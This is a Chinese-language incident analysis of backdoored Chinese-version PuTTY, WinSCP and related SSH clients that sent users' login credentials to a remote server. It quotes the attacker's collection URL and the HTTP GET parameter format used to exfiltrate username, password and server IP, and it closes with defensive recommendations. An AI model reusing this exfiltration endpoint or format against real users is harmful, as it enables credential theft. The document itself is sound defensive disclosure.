知道創宇 - 中文版putty後門事件分析
近幾日,中文版putty等ssh遠端管理工具被曝出存在後門,該後門會自動竊取管理員所輸入的ssh使用者名稱與口令,並將其傳送至指定伺服器上。知道創宇安全研究小組在第一時間獲取該訊息後,對此次事件進行了跟蹤和分析。根據分析,此次事件涉及到來自putty.org.cn、putty.ws、winscp.cc和sshsecure.com站點的中文版putty、winscp、sshsecure和psftp等軟體,而這些軟體的英文版本不受影響。1.時間線
1月30日下午16點左右:網際網路上再度出現關於中文版putty等ssh管理軟體被裝有後門的訊息,並且此訊息對後門的行為特徵進行了簡要的描述 —— 該程式會導致root密碼丟失,但發布者仍未披露具體的技術細節:
1月31日:經過一晚的醞釀,putty事件開始在網際網路上廣泛傳播,微博、論壇等資訊發布平台上開始大量出現putty後門事件的訊息,同時,很多技術人員也開始對含有後門的putty等ssh管理軟體進行技術分析,並陸續發布其中的技術細節。
2.事件分析
2.1問題軟體源頭
知道創宇安全研究團隊在獲取資訊後,第一時間對putty等軟體進行了跟蹤分析。
通過分析發現,來自以下幾個站點的中文版putty、winscp、sshsecure和psftp等軟體都可能存在後門程式:
2.2行為分析
2.2.1網路行為分析
使用帶有後門程式的中文版putty等ssh管理軟體連線伺服器時,程式會自動記錄登入時的使用者名稱、密碼和伺服器ip位址等資訊,並會以http的方式將這些資訊傳送到指定的伺服器上,以下是在分析過程中抓取到的原始http資料:
從以上資料可以獲得以下資訊:
敏感資訊通過http get的方式傳送到伺服器l.ip-163.com上(經測試,該網域名稱與putty.org.cn位於同一ip位址上)
用於收集密碼的程式位址為http:// l.ip-163.com:88/yj33/js2.asp
act=add&user=50.23.79.188&pwd=abc&ll1=pass&ll2=22&ll3=putty
每個欄位的作用如下:
2.2.2伺服器本地檔案分析
知道創宇安全研究團隊借助檔案完整性校驗的方式,對伺服器初始安全狀態下的/etc、/lib、/usr、/bin等敏感目錄進行了完整性備份,並在putty連線測試後對這些目錄的檔案變更、丟失和新增等情況進行了校驗,校驗結果顯示,中文版putty並未對伺服器自動安裝後門程式。
網路上部分訊息稱,有些使用中文版putty進行過遠端管理的伺服器上出現惡意**和檔案,可能是由於惡意使用者獲取了putty所收集的密碼後人為植入所致。
2.3事件後續
截止至2月1日,在本次事件中所涉及的以下網域名稱均已不能訪問:
但是,在1月31日晚,網路上傳出「l.ip-163.com被黑」的訊息並配有一張「受害者列表」的截圖:
3.安全建議
若您使用過中文版的putty、winscp、sshsecure和psftp等軟體,但暫時又不能對伺服器進行下線處理,可採取以下臨時解決方案來處理:
使用chkrootkit或rootkit hunter對伺服器進行掃瞄,檢查是否存在已知後門
檢視網路是否有可疑外聯,並加強對可疑外聯的監控
在網路層建立埠訪問控制策略,阻止除正常業務外的一切非業務、非管理埠
更換ssh登入密碼,建議登入時使用證書加密碼的組合方式進行身份驗證
登入ssh時,不要直接使用root使用者,先使用普通使用者登入後,再su至root
創宇技能表 知道創宇研發技能表 一
凡是以 知道創宇研發技能表 為標題的部落格,所有內容均來自 知道創宇研發技能表 雖然不是黑客,但這表裡不少內容還是很有意思的,所以逐步看了整理到部落格,感謝總結分享的同學。公司與個人公司是盈利性組織 個人和公司必須雙贏 在認同公司理念且能夠給公司創造足夠價值的基礎上,為個人發展而工作 第三條,是我認...
Windows Home Server 中文版來了
簡體和正體中文版windows home server將在2008年下半年全面推出了!6月5日,windows home server產品部總經理charlie kindel在台灣宣布了這個訊息。此次中文版在台北computex展出,合作夥伴包括技嘉 gigabyte 威盛 via 啟基 wnc 和...
ilove中文 iLovePDF中文版
軟體介紹 ilovepdf是一款pdf檔案處理工具,可以幫助使用者對pdf檔案進行壓縮 拆分 合併 轉換 編輯等處理,還可以轉換成其它格式,支援pdf檔案瀏覽及加密,是一款很好的pdf檔案工具。軟體特色 離線操作 無需網路連線。你可以隨時隨地進行pdf檔案的壓縮 合併 拆分 轉換和編輯。輕鬆閱讀 使...